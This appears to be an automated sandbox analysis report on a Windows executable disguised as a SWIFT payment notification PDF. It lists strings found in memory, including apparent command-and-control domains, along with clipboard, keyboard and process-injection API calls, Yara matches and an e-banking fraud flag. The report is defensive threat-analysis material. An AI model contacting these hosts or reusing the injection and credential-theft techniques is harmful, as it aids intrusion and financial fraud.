0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>openresty/1.13.6.1</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->

Source: DevicePairingWizard.exe, 0000000C.00000002.5056935552.0000000007460000.00000004.00000800.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000002.5055513570.000000000557C000.00000004.10000000.00040000.00000000.sdmp, nmlZZxePqIALDF.exe, 0000000D.00000002.5959819188.0000000003EDC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot
Source: DevicePairingWizard.exe, 0000000C.00000002.5056935552.0000000007460000.00000004.00000800.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000002.5055513570.000000000557C000.00000004.10000000.00040000.00000000.sdmp, nmlZZxePqIALDF.exe, 0000000D.00000002.5959819188.0000000003EDC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefix
Source: DevicePairingWizard.exe, 0000000C.00000002.5056935552.0000000007460000.00000004.00000800.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000002.5055513570.000000000557C000.00000004.10000000.00040000.00000000.sdmp, nmlZZxePqIALDF.exe, 0000000D.00000002.5959819188.0000000003EDC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otf
Source: DevicePairingWizard.exe, 0000000C.00000002.5056935552.0000000007460000.00000004.00000800.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000002.5055513570.000000000557C000.00000004.10000000.00040000.00000000.sdmp, nmlZZxePqIALDF.exe, 0000000D.00000002.5959819188.0000000003EDC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-bold
Source: DevicePairingWizard.exe, 0000000C.00000002.5056935552.0000000007460000.00000004.00000800.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000002.5055513570.000000000557C000.00000004.10000000.00040000.00000000.sdmp, nmlZZxePqIALDF.exe, 0000000D.00000002.5959819188.0000000003EDC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttf
Source: DevicePairingWizard.exe, 0000000C.00000002.5056935552.0000000007460000.00000004.00000800.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000002.5055513570.000000000557C000.00000004.10000000.00040000.00000000.sdmp, nmlZZxePqIALDF.exe, 0000000D.00000002.5959819188.0000000003EDC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff
Source: DevicePairingWizard.exe, 0000000C.00000002.5056935552.0000000007460000.00000004.00000800.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000002.5055513570.000000000557C000.00000004.10000000.00040000.00000000.sdmp, nmlZZxePqIALDF.exe, 0000000D.00000002.5959819188.0000000003EDC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2
Source: DevicePairingWizard.exe, 0000000C.00000002.5056935552.0000000007460000.00000004.00000800.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000002.5055513570.000000000557C000.00000004.10000000.00040000.00000000.sdmp, nmlZZxePqIALDF.exe, 0000000D.00000002.5959819188.0000000003EDC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot
Source: DevicePairingWizard.exe, 0000000C.00000002.5056935552.0000000007460000.00000004.00000800.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000002.5055513570.000000000557C000.00000004.10000000.00040000.00000000.sdmp, nmlZZxePqIALDF.exe, 0000000D.00000002.5959819188.0000000003EDC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefix
Source: DevicePairingWizard.exe, 0000000C.00000002.5056935552.0000000007460000.00000004.00000800.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000002.5055513570.000000000557C000.00000004.10000000.00040000.00000000.sdmp, nmlZZxePqIALDF.exe, 0000000D.00000002.5959819188.0000000003EDC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otf
Source: DevicePairingWizard.exe, 0000000C.00000002.5056935552.0000000007460000.00000004.00000800.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000002.5055513570.000000000557C000.00000004.10000000.00040000.00000000.sdmp, nmlZZxePqIALDF.exe, 0000000D.00000002.5959819188.0000000003EDC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regular
Source: DevicePairingWizard.exe, 0000000C.00000002.5056935552.0000000007460000.00000004.00000800.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000002.5055513570.000000000557C000.00000004.10000000.00040000.00000000.sdmp, nmlZZxePqIALDF.exe, 0000000D.00000002.5959819188.0000000003EDC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttf
Source: DevicePairingWizard.exe, 0000000C.00000002.5056935552.0000000007460000.00000004.00000800.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000002.5055513570.000000000557C000.00000004.10000000.00040000.00000000.sdmp, nmlZZxePqIALDF.exe, 0000000D.00000002.5959819188.0000000003EDC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff
Source: DevicePairingWizard.exe, 0000000C.00000002.5056935552.0000000007460000.00000004.00000800.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000002.5055513570.000000000557C000.00000004.10000000.00040000.00000000.sdmp, nmlZZxePqIALDF.exe, 0000000D.00000002.5959819188.0000000003EDC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2
Source: DevicePairingWizard.exe, 0000000C.00000002.5056935552.0000000007460000.00000004.00000800.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000002.5055513570.000000000557C000.00000004.10000000.00040000.00000000.sdmp, nmlZZxePqIALDF.exe, 0000000D.00000002.5959819188.0000000003EDC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://i3.cdn-image.com/__media__/js/min.js?v2.3
Source: DevicePairingWizard.exe, 0000000C.00000002.5056935552.0000000007460000.00000004.00000800.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000002.5055513570.000000000557C000.00000004.10000000.00040000.00000000.sdmp, nmlZZxePqIALDF.exe, 0000000D.00000002.5959819188.0000000003EDC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://i3.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpg
Source: DevicePairingWizard.exe, 0000000C.00000002.5056935552.0000000007460000.00000004.00000800.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000002.5055513570.000000000557C000.00000004.10000000.00040000.00000000.sdmp, nmlZZxePqIALDF.exe, 0000000D.00000002.5959819188.0000000003EDC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://i3.cdn-image.com/__media__/pics/28903/search.png)
Source: DevicePairingWizard.exe, 0000000C.00000002.5056935552.0000000007460000.00000004.00000800.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000002.5055513570.000000000557C000.00000004.10000000.00040000.00000000.sdmp, nmlZZxePqIALDF.exe, 0000000D.00000002.5959819188.0000000003EDC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://i3.cdn-image.com/__media__/pics/28905/arrrow.png)
Source: DevicePairingWizard.exe, 0000000C.00000002.5056935552.0000000007460000.00000004.00000800.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000002.5055513570.000000000557C000.00000004.10000000.00040000.00000000.sdmp, nmlZZxePqIALDF.exe, 0000000D.00000002.5959819188.0000000003EDC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://i3.cdn-image.com/__media__/pics/29590/bg1.png)
Source: DevicePairingWizard.exe, 0000000C.00000002.5056935552.0000000007460000.00000004.00000800.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000002.5055513570.000000000557C000.00000004.10000000.00040000.00000000.sdmp, nmlZZxePqIALDF.exe, 0000000D.00000002.5959819188.0000000003EDC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://i3.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpg
Source: DevicePairingWizard.exe, 0000000C.00000002.5056935552.0000000007460000.00000004.00000800.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000002.5055513570.000000000557C000.00000004.10000000.00040000.00000000.sdmp, nmlZZxePqIALDF.exe, 0000000D.00000002.5959819188.0000000003EDC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.Rimberiokitchen.online
Source: nmlZZxePqIALDF.exe, 0000000D.00000002.5958070475.0000000001519000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.econsultoria.online
Source: nmlZZxePqIALDF.exe, 0000000D.00000002.5958070475.0000000001519000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.econsultoria.online/cbd3/
Source: DevicePairingWizard.exe, 0000000C.00000002.5056935552.0000000007460000.00000004.00000800.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000002.5055513570.000000000557C000.00000004.10000000.00040000.00000000.sdmp, nmlZZxePqIALDF.exe, 0000000D.00000002.5959819188.0000000003EDC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.rimberiokitchen.online/Bathroom_Cabinets.cfm?fp=X2STJX2iN0rw6IGJ4h%2B4RPbPlzKdu8upcAIRhXu
Source: DevicePairingWizard.exe, 0000000C.00000002.5056935552.0000000007460000.00000004.00000800.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000002.5055513570.000000000557C000.00000004.10000000.00040000.00000000.sdmp, nmlZZxePqIALDF.exe, 0000000D.00000002.5959819188.0000000003EDC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.rimberiokitchen.online/Bathroom_Design_Ideas.cfm?fp=X2STJX2iN0rw6IGJ4h%2B4RPbPlzKdu8upcAI
Source: DevicePairingWizard.exe, 0000000C.00000002.5056935552.0000000007460000.00000004.00000800.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000002.5055513570.000000000557C000.00000004.10000000.00040000.00000000.sdmp, nmlZZxePqIALDF.exe, 0000000D.00000002.5959819188.0000000003EDC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.rimberiokitchen.online/Bathroom_Remodeling_Tips.cfm?fp=X2STJX2iN0rw6IGJ4h%2B4RPbPlzKdu8up
Source: DevicePairingWizard.exe, 0000000C.00000002.5056935552.0000000007460000.00000004.00000800.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000002.5055513570.000000000557C000.00000004.10000000.00040000.00000000.sdmp, nmlZZxePqIALDF.exe, 0000000D.00000002.5959819188.0000000003EDC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.rimberiokitchen.online/Kitchen_Products.cfm?fp=X2STJX2iN0rw6IGJ4h%2B4RPbPlzKdu8upcAIRhXuJ
Source: DevicePairingWizard.exe, 0000000C.00000002.5056935552.0000000007460000.00000004.00000800.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000002.5055513570.000000000557C000.00000004.10000000.00040000.00000000.sdmp, nmlZZxePqIALDF.exe, 0000000D.00000002.5959819188.0000000003EDC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.rimberiokitchen.online/Kitchen_Remodeling.cfm?fp=X2STJX2iN0rw6IGJ4h%2B4RPbPlzKdu8upcAIRhX
Source: DevicePairingWizard.exe, 0000000C.00000002.5056935552.0000000007460000.00000004.00000800.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000002.5055513570.000000000557C000.00000004.10000000.00040000.00000000.sdmp, nmlZZxePqIALDF.exe, 0000000D.00000002.5959819188.0000000003EDC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.rimberiokitchen.online/__media__/design/underconstructionnotice.php?d=rimberiokitchen.onl
Source: DevicePairingWizard.exe, 0000000C.00000002.5056935552.0000000007460000.00000004.00000800.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000002.5055513570.000000000557C000.00000004.10000000.00040000.00000000.sdmp, nmlZZxePqIALDF.exe, 0000000D.00000002.5959819188.0000000003EDC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.rimberiokitchen.online/__media__/js/trademark.php?d=rimberiokitchen.online&type=ns
Source: DevicePairingWizard.exe, 0000000C.00000002.5056935552.0000000007460000.00000004.00000800.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000002.5055513570.000000000557C000.00000004.10000000.00040000.00000000.sdmp, nmlZZxePqIALDF.exe, 0000000D.00000002.5959819188.0000000003EDC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.rimberiokitchen.online/px.js?ch=1
Source: DevicePairingWizard.exe, 0000000C.00000002.5056935552.0000000007460000.00000004.00000800.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000002.5055513570.000000000557C000.00000004.10000000.00040000.00000000.sdmp, nmlZZxePqIALDF.exe, 0000000D.00000002.5959819188.0000000003EDC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.rimberiokitchen.online/px.js?ch=2
Source: DevicePairingWizard.exe, 0000000C.00000002.5056935552.0000000007460000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.rimberiokitchen.online/sk-logabpstatus.php?a=L1N3WXcvTG4rbTFUeWgzcExCUXZVOTUzaFVabnBmQkpi
Source: DevicePairingWizard.exe, 0000000C.00000002.5056935552.0000000007460000.00000004.00000800.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000002.5055513570.000000000557C000.00000004.10000000.00040000.00000000.sdmp, nmlZZxePqIALDF.exe, 0000000D.00000002.5959819188.0000000003EDC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.rimberiokitchen.online/sk-logabpstatus.php?a=TEdQajRwbU5mNWR3d0VHeGk1WjViUVdIYjZ3dUM5K0NC
Source: DevicePairingWizard.exe, 0000000C.00000002.5057040263.000000000777B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: DevicePairingWizard.exe, 0000000C.00000002.5057040263.000000000777B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: nmlZZxePqIALDF.exe, 0000000D.00000002.5959819188.0000000003EDC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://dts.gnpge.com
Source: c104-9J-L.12.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: DevicePairingWizard.exe, 0000000C.00000002.5057040263.000000000777B000.00000004.00000020.00020000.00000000.sdmp, c104-9J-L.12.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: c104-9J-L.12.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: DevicePairingWizard.exe, 0000000C.00000002.5057040263.000000000777B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gemini.google.com/app?q=
Source: DevicePairingWizard.exe, 0000000C.00000003.1625784978.000000000088C000.00000004.00000020.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000003.1621886723.0000000000870000.00000004.00000020.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000002.5053346838.000000000088C000.00000004.00000020.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000003.1622047389.000000000088C000.00000004.00000020.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000003.1626735985.000000000088C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/
Source: DevicePairingWizard.exe, 0000000C.00000003.1625784978.000000000088C000.00000004.00000020.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000003.1621886723.0000000000870000.00000004.00000020.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000002.5053346838.000000000088C000.00000004.00000020.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000003.1622047389.000000000088C000.00000004.00000020.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000003.1626735985.000000000088C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com//
Source: DevicePairingWizard.exe, 0000000C.00000003.1625784978.000000000088C000.00000004.00000020.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000003.1621886723.0000000000870000.00000004.00000020.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000002.5053346838.000000000088C000.00000004.00000020.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000003.1622047389.000000000088C000.00000004.00000020.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000003.1626735985.000000000088C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/v104
Source: DevicePairingWizard.exe, 0000000C.00000002.5053346838.000000000084D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrd?lcid=1033&syslcid=2057&uilcid=1033&app=1&ver=16&build=1
Source: DevicePairingWizard.exe, 0000000C.00000002.5053346838.0000000000828000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrdlcid=1033&syslcid=2057&uilcid=1033&app=1&ver=16&build=16
Source: DevicePairingWizard.exe, 0000000C.00000003.1621095255.000000000775D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrdres://C:
Source: DevicePairingWizard.exe, 0000000C.00000002.5057040263.00000000077E0000.00000004.00000020.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000002.5057040263.000000000777B000.00000004.00000020.00020000.00000000.sdmp, c104-9J-L.12.dr	String found in binary or memory: https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search
Source: DevicePairingWizard.exe, 0000000C.00000002.5057040263.00000000077E0000.00000004.00000020.00020000.00000000.sdmp, c104-9J-L.12.dr	String found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: DevicePairingWizard.exe, 0000000C.00000002.5057040263.000000000777B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: DevicePairingWizard.exe, 0000000C.00000002.5055513570.000000000620C000.00000004.10000000.00040000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000002.5055513570.0000000006530000.00000004.10000000.00040000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000002.5055513570.00000000066C2000.00000004.10000000.00040000.00000000.sdmp, nmlZZxePqIALDF.exe, 0000000D.00000002.5959819188.0000000005022000.00000004.00000001.00040000.00000000.sdmp, nmlZZxePqIALDF.exe, 0000000D.00000002.5959819188.0000000004E90000.00000004.00000001.00040000.00000000.sdmp, nmlZZxePqIALDF.exe, 0000000D.00000002.5959819188.0000000004B6C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: c104-9J-L.12.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: DevicePairingWizard.exe, 0000000C.00000002.5055513570.0000000005EE8000.00000004.10000000.00040000.00000000.sdmp, nmlZZxePqIALDF.exe, 0000000D.00000002.5959819188.0000000004848000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.hostgator.com.br

Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe

Code function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_0045A10F

Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe

Code function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_0045A10F

Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe

Code function: 0_2_0046DC80 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,

0_2_0046DC80

Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe

Code function: 0_2_0044C37A GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,SendInput,

0_2_0044C37A

Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe

Code function: 0_2_0047C81C SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

0_2_0047C81C

E-Banking Fraud

Initial sample is a PE file and has a suspicious name

Source: Yara match	File source: 2.2.svchost.exe.520000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.520000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.5958070475.00000000014A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1441626408.0000000000520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1442932990.0000000003550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.5054439385.0000000004310000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.5054354866.00000000042C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1443008474.00000000035A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.5958733126.0000000002A80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

System Summary

Source: initial sample	Static PE information: Filename: Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe
Source: initial sample	Static PE information: Filename: Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0054C9B3 NtClose,	2_2_0054C9B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_005217D5 NtProtectVirtualMemory,	2_2_005217D5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032734E0 NtCreateMutant,LdrInitializeThunk,	2_2_032734E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272A80 NtClose,LdrInitializeThunk,	2_2_03272A80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272D10 NtQuerySystemInformation,LdrInitializeThunk,	2_2_03272D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03274260 NtSetContextThread,	2_2_03274260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03274570 NtSuspendThread,	2_2_03274570
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272B20 NtQueryInformationProcess,	2_2_03272B20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272B00 NtQueryValueKey,	2_2_03272B00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272B10 NtAllocateVirtualMemory,	2_2_03272B10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272B80 NtCreateKey,	2_2_03272B80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272B90 NtFreeVirtualMemory,	2_2_03272B90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272BE0 NtQueryVirtualMemory,	2_2_03272BE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272BC0 NtQueryInformationToken,	2_2_03272BC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272A10 NtWriteFile,	2_2_03272A10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272AA0 NtQueryInformationFile,	2_2_03272AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272AC0 NtEnumerateValueKey,	2_2_03272AC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032729F0 NtReadFile,	2_2_032729F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032729D0 NtWaitForSingleObject,	2_2_032729D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032738D0 NtGetContextThread,	2_2_032738D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272F30 NtOpenDirectoryObject,	2_2_03272F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272F00 NtCreateFile,	2_2_03272F00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272FB0 NtSetValueKey,	2_2_03272FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272E00 NtQueueApcThread,	2_2_03272E00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272E50 NtCreateSection,	2_2_03272E50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272EB0 NtProtectVirtualMemory,	2_2_03272EB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272E80 NtCreateProcessEx,	2_2_03272E80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272EC0 NtQuerySection,	2_2_03272EC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272ED0 NtResumeThread,	2_2_03272ED0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272D50 NtWriteVirtualMemory,	2_2_03272D50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272DA0 NtReadVirtualMemory,	2_2_03272DA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272DC0 NtAdjustPrivilegesToken,	2_2_03272DC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272C20 NtSetInformationFile,	2_2_03272C20
